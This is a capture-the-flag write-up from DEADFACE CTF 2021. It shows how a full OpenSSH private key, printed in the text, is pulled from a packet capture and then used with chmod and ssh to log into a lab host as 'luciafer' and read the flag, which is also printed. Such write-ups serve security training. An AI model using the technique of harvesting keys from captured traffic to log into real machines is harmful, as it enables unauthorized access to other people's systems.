Rating:

# The Root of All Evil... OR... Adding Insult to Injury
![Category](http://img.shields.io/badge/Category-Exploitation-orange?style=for-the-badge) ![Points](http://img.shields.io/badge/Points-300-brightgreen?style=for-the-badge)

## Details

>Great news! Luciafer has been spotted at an internet cafe! She's using her laptop right now! We can catch her, if we act quickly.
>
>We need your help. Can you figure out a way to remotely connect to her machine and capture the flag?
>
>Her username on her system is `luciafer`, and her hostname is:
>`batescafe.deadface.io`
>
>Use the PCAP from Monstrum ex Machina
---
Starting at the bottom of the Packet capturre file, if we browse through the packets one by one moving up to packet number `160849` we notice the below.

![image](https://user-images.githubusercontent.com/73170900/137876793-e7bc9195-1fd6-4047-bdc5-83a87f3bee37.png)

If we follow the TCP Stream for this packet we can see the full RSA Private Key

![image](https://user-images.githubusercontent.com/73170900/137877103-1506a245-491a-4a83-b535-65ad06236884.png)

```
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----
```

If we copy this key and save it to a file on our local machine, then set the permission to `600`

```bash
chmod 600 key_from_pcap
```

We can connect to the shell using the command;

```bash
ssh -i key_from_pcap [email protected]

❯ ssh -i key_from_pcap [email protected]
luciafer@d37a1fc45114:~$
```

Running a recursive `ls` command we can see the following;

```bash
luciafer@d37a1fc45114:~$ ls -alR
.:
total 40
drwxr-xr-x 1 luciafer luciafer 4096 Oct 10 02:45 .
drwxr-xr-x 1 root root 4096 Oct 10 02:45 ..
-rw-r--r-- 1 luciafer luciafer 220 Oct 10 02:45 .bash_logout
-rw-r--r-- 1 luciafer luciafer 3771 Oct 10 02:45 .bashrc
-rw-r--r-- 1 luciafer luciafer 807 Oct 10 02:45 .profile
drwxr-xr-x 1 luciafer luciafer 4096 Oct 10 02:45 Documents
drwxr-xr-x 1 luciafer luciafer 4096 Oct 10 02:46 Downloads
drwxr-xr-x 1 luciafer luciafer 4096 Oct 10 02:45 Music
drwxr-xr-x 1 luciafer luciafer 4096 Oct 10 02:45 Pictures
drwxr-xr-x 1 luciafer luciafer 4096 Oct 10 02:45 Videos

./Documents:
total 8
drwxr-xr-x 1 luciafer luciafer 4096 Oct 10 02:45 .
drwxr-xr-x 1 luciafer luciafer 4096 Oct 10 02:45 ..

./Downloads:
total 12
drwxr-xr-x 1 luciafer luciafer 4096 Oct 10 02:46 .
drwxr-xr-x 1 luciafer luciafer 4096 Oct 10 02:45 ..
-rw-rw-r-- 1 luciafer luciafer 49 Oct 10 02:45 flag.txt

./Music:
total 8
drwxr-xr-x 1 luciafer luciafer 4096 Oct 10 02:45 .
drwxr-xr-x 1 luciafer luciafer 4096 Oct 10 02:45 ..

./Pictures:
total 8
drwxr-xr-x 1 luciafer luciafer 4096 Oct 10 02:45 .
drwxr-xr-x 1 luciafer luciafer 4096 Oct 10 02:45 ..

./Videos:
total 8
drwxr-xr-x 1 luciafer luciafer 4096 Oct 10 02:45 .
drwxr-xr-x 1 luciafer luciafer 4096 Oct 10 02:45 ..
```

We can the `cat` the flag like so;

```
luciafer@d37a1fc45114:~$ cat Downloads/flag.txt
flag{Lucy-a-FUR-G0T-R3KT-by-the-BLUZers-CLUB!!!}
```

## flag{Lucy-a-FUR-G0T-R3KT-by-the-BLUZers-CLUB!!!}

Original writeup (https://github.com/CTSecUK/DEADFACE_CTF_2021/blob/main/Write-ups/Exploitation/The%20Root%20of%20All%20Evil...%20OR...%20Adding%20Insult%20to%20Injury%20(300%20Points).md).